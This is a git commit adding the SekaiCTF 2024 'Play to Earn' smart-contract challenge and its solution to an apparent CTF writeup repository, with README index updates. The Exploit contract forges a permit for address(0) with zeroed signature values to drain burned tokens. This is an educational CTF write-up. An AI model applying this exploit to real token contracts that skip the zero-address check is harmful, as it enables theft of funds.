add sekai ctf 2024 play to earn

minaminao · minaminao · commit 79d8b02bddbb · 2025-08-16T09:48:16.000+09:00
diff --git a/README.md b/README.md
@@ -49,6 +49,7 @@ Please be aware that these contain spoilers. For contribution guidelines, please
   - [ECDSA signature malleability attacks](#ecdsa-signature-malleability-attacks)
   - [Brute-forcing addresses](#brute-forcing-addresses)
   - [Recoveries of public keys](#recoveries-of-public-keys)
+  - [`ecrecover` returns `address(0)` for invalid signatures](#ecrecover-returns-address0-for-invalid-signatures)
   - [Encryption and decryption in secp256k1](#encryption-and-decryption-in-secp256k1)
   - [Bypassing bots and taking ERC-20 tokens owned by wallets with known private keys](#bypassing-bots-and-taking-erc-20-tokens-owned-by-wallets-with-known-private-keys)
   - [Claimable intermediate nodes of Merkle trees](#claimable-intermediate-nodes-of-merkle-trees)
@@ -255,10 +256,10 @@ Note:
 - If a destination is a contract and there is no receive Ether function or payable fallback function, Ether cannot be transferred.
 - However, instead of the normal transfer functions, the `selfdestruct` described in the next section can be used to force such a contract to transfer Ether.
 
-| Challenge                                                                  | Note, Keywords |
-| -------------------------------------------------------------------------- | -------------- |
-| [Ethernaut: 9. King](src/Ethernaut/)                                       |                |
-| [Project SEKAI CTF 2022: Random Song](src/ProjectSekaiCTF2022/RandomSong/) | Chainlink VRF  |
+| Challenge                                                         | Note, Keywords |
+| ----------------------------------------------------------------- | -------------- |
+| [Ethernaut: 9. King](src/Ethernaut/)                              |                |
+| [SekaiCTF 2022: Random Song](src/ProjectSekaiCTF2022/RandomSong/) | Chainlink VRF  |
 
 ### Forced Ether transfers to non-payable contracts via `selfdestruct`
 - If a contract does not have a receive Ether function and a payable fallback function, it is not guaranteed that Ether will not be received.
@@ -368,9 +369,9 @@ Note:
 ### EVM assembly logic bugs
 - Logic bugs in assemblies such as Yul
 
-| Challenge                                               | Note, Keywords |
-| ------------------------------------------------------- | -------------- |
-| [Project SEKAI CTF 2024: Zoo](src/ProjectSekaiCTF2024/) | `Pausable`     |
+| Challenge                                      | Note, Keywords |
+| ---------------------------------------------- | -------------- |
+| [SekaiCTF 2024: Zoo](src/ProjectSekaiCTF2024/) | `Pausable`     |
 
 ### EVM bytecode golf
 - These challenges have a limit on the length of the bytecode to be created.
@@ -427,7 +428,7 @@ Note:
 | [QuillCTF 2022: SafeNFT](src/QuillCTF2022/SafeNFT)                              | ERC721, `_safeMint()`      |
 | [Numen Cyber CTF 2023: SimpleCall](src/NumenCTF/)                               | `call`                     |
 | [SEETF 2023: PigeonBank](src/SEETF2023/)                                        |                            |
-| [Project SEKAI CTF 2023: Re-Remix](src/ProjectSekaiCTF2023/)                    | Read-Only Reentrancy       |
+| [SekaiCTF 2023: Re-Remix](src/ProjectSekaiCTF2023/)                             | Read-Only Reentrancy       |
 | [SECCON Beginners CTF 2024: vote4b](src/SECCONBeginnersCTF2024/vote4b/)         | ERC721, `_safeMint()`      |
 
 ### Flash loan basics
@@ -535,6 +536,14 @@ Note:
 | ----------------------------------------------------- | -------------- |
 | [Capture The Ether: Public Key](src/CaptureTheEther/) | RLP, ECDSA     |
 
+### `ecrecover` returns `address(0)` for invalid signatures
+- The `ecrecover` precompile returns `address(0)` when the signature is invalid or malformed.
+- This behavior can be exploited if contracts don't properly validate the return value of `ecrecover`.
+
+| Challenge                                                          | Note, Keywords |
+| ------------------------------------------------------------------ | -------------- |
+| [SekaiCTF 2024: Play to Earn](src/ProjectSekaiCTF2024/PlayToEarn/) | Burn           |
+
 ### Encryption and decryption in secp256k1
 
 | Challenge                                       | Note, Keywords  |
@@ -697,8 +706,8 @@ Note
 | Paradigm CTF 2022: SOLHANA-2                          |                      |
 | Paradigm CTF 2022: SOLHANA-3                          |                      |
 | corCTF 2023: tribunal                                 |                      |
-| Project SEKAI CTF 2023: The Bidding                   |                      |
-| Project SEKAI CTF 2023: Play for Free                 |                      |
+| SekaiCTF 2023: The Bidding                            |                      |
+| SekaiCTF 2023: Play for Free                          |                      |
 
 ## Cosmos
 
diff --git a/src/ProjectSekaiCTF2024/PlayToEarn/Exploit.t.sol b/src/ProjectSekaiCTF2024/PlayToEarn/Exploit.t.sol
@@ -0,0 +1,46 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.20;
+
+import {Test, console} from "forge-std/Test.sol";
+import {Setup, Coin} from "./challenge/Setup.sol";
+
+contract ExploitTest is Test {
+    address playerAddr = makeAddr("player");
+    Setup setup;
+
+    function setUp() public {
+        vm.deal(playerAddr, 1 ether);
+        setup = new Setup{value: 20 ether}();
+    }
+
+    function test() public {
+        vm.startPrank(playerAddr, playerAddr);
+
+        new Exploit(address(setup));
+
+        vm.stopPrank();
+
+        assertTrue(setup.isSolved());
+    }
+}
+
+contract Exploit {
+    constructor(address setupAddr) {
+        Setup setup = Setup(setupAddr);
+        setup.register();
+        Coin coin = setup.coin();
+        // address(0) に burn されている
+        // ecrecover は無効な署名には address(0) を返す
+        coin.permit({
+            owner: address(0),
+            spender: address(this),
+            value: 19 ether,
+            deadline: block.timestamp + 1 days,
+            v: uint8(0),
+            r: bytes32(0),
+            s: bytes32(0)
+        });
+        coin.transferFrom(address(0), address(this), 19 ether);
+        coin.withdraw(19 ether);
+    }
+}
diff --git a/src/ProjectSekaiCTF2024/PlayToEarn/README.md b/src/ProjectSekaiCTF2024/PlayToEarn/README.md
@@ -0,0 +1,3 @@
+```
+ncat --ssl play-to-earn.chals.sekai.team 1337
+```
diff --git a/src/ProjectSekaiCTF2024/PlayToEarn/challenge/ArcadeMachine.sol b/src/ProjectSekaiCTF2024/PlayToEarn/challenge/ArcadeMachine.sol
@@ -0,0 +1,17 @@
+pragma solidity 0.8.25;
+
+import {Coin} from "./Coin.sol";
+
+contract ArcadeMachine {
+    Coin coin;
+
+    constructor(Coin _coin) {
+        coin = _coin;
+    }
+
+    function play(uint256 times) external {
+        // burn the coins
+        require(coin.transferFrom(msg.sender, address(0), 1 ether * times));
+        // Have fun XD
+    }
+}
diff --git a/src/ProjectSekaiCTF2024/PlayToEarn/challenge/Coin.sol b/src/ProjectSekaiCTF2024/PlayToEarn/challenge/Coin.sol
@@ -0,0 +1,89 @@
+pragma solidity 0.8.25;
+
+import "@openzeppelin/contracts/access/Ownable.sol";
+import "@openzeppelin/contracts/utils/cryptography/EIP712.sol";
+
+contract Coin is Ownable, EIP712 {
+    string public constant name = "COIN";
+    string public constant symbol = "COIN";
+    uint8 public constant decimals = 18;
+    bytes32 constant PERMIT_TYPEHASH =
+        keccak256("Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)");
+
+    event Approval(address indexed src, address indexed guy, uint256 wad);
+    event Transfer(address indexed src, address indexed dst, uint256 wad);
+    event Deposit(address indexed dst, uint256 wad);
+    event Withdrawal(address indexed src, uint256 wad);
+    event PrivilegedWithdrawal(address indexed src, uint256 wad);
+
+    mapping(address => uint256) public nonces;
+    mapping(address => uint256) public balanceOf;
+    mapping(address => mapping(address => uint256)) public allowance;
+
+    constructor() Ownable(msg.sender) EIP712(name, "1") {}
+
+    fallback() external payable {
+        deposit();
+    }
+
+    function deposit() public payable {
+        balanceOf[msg.sender] += msg.value;
+        emit Deposit(msg.sender, msg.value);
+    }
+
+    function withdraw(uint256 wad) external {
+        require(balanceOf[msg.sender] >= wad);
+        balanceOf[msg.sender] -= wad;
+        payable(msg.sender).transfer(wad);
+        emit Withdrawal(msg.sender, wad);
+    }
+
+    function privilegedWithdraw() external onlyOwner {
+        uint256 wad = balanceOf[address(0)];
+        balanceOf[address(0)] = 0;
+        payable(msg.sender).transfer(wad);
+        emit PrivilegedWithdrawal(msg.sender, wad);
+    }
+
+    function totalSupply() public view returns (uint256) {
+        return address(this).balance;
+    }
+
+    function approve(address guy, uint256 wad) public returns (bool) {
+        allowance[msg.sender][guy] = wad;
+        emit Approval(msg.sender, guy, wad);
+        return true;
+    }
+
+    function permit(address owner, address spender, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s)
+        external
+    {
+        require(block.timestamp <= deadline, "signature expired");
+        bytes32 structHash = keccak256(abi.encode(PERMIT_TYPEHASH, owner, spender, value, nonces[owner]++, deadline));
+        bytes32 h = _hashTypedDataV4(structHash);
+        address signer = ecrecover(h, v, r, s);
+        require(signer == owner, "invalid signer");
+        allowance[owner][spender] = value;
+        emit Approval(owner, spender, value);
+    }
+
+    function transfer(address dst, uint256 wad) public returns (bool) {
+        return transferFrom(msg.sender, dst, wad);
+    }
+
+    function transferFrom(address src, address dst, uint256 wad) public returns (bool) {
+        require(balanceOf[src] >= wad);
+
+        if (src != msg.sender && allowance[src][msg.sender] != type(uint256).max) {
+            require(allowance[src][msg.sender] >= wad);
+            allowance[src][msg.sender] -= wad;
+        }
+
+        balanceOf[src] -= wad;
+        balanceOf[dst] += wad;
+
+        emit Transfer(src, dst, wad);
+
+        return true;
+    }
+}
diff --git a/src/ProjectSekaiCTF2024/PlayToEarn/challenge/Setup.sol b/src/ProjectSekaiCTF2024/PlayToEarn/challenge/Setup.sol
@@ -0,0 +1,32 @@
+pragma solidity 0.8.25;
+
+import {Coin} from "./Coin.sol";
+import {ArcadeMachine} from "./ArcadeMachine.sol";
+
+contract Setup {
+    Coin public coin;
+    ArcadeMachine public arcadeMachine;
+
+    address player;
+
+    constructor() payable {
+        coin = new Coin();
+        arcadeMachine = new ArcadeMachine(coin);
+
+        // Assume that many people have played before you ;)
+        require(msg.value == 20 ether);
+        coin.deposit{value: 20 ether}();
+        coin.approve(address(arcadeMachine), 19 ether);
+        arcadeMachine.play(19);
+    }
+
+    function register() external {
+        require(player == address(0));
+        player = msg.sender;
+        coin.transfer(msg.sender, 1337); // free coins for new players :)
+    }
+
+    function isSolved() external view returns (bool) {
+        return player != address(0) && player.balance >= 13.37 ether;
+    }
+}

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,3 @@`
	`1`	+```
	`2`	`+ncat --ssl play-to-earn.chals.sekai.team 1337`
	`3`	+```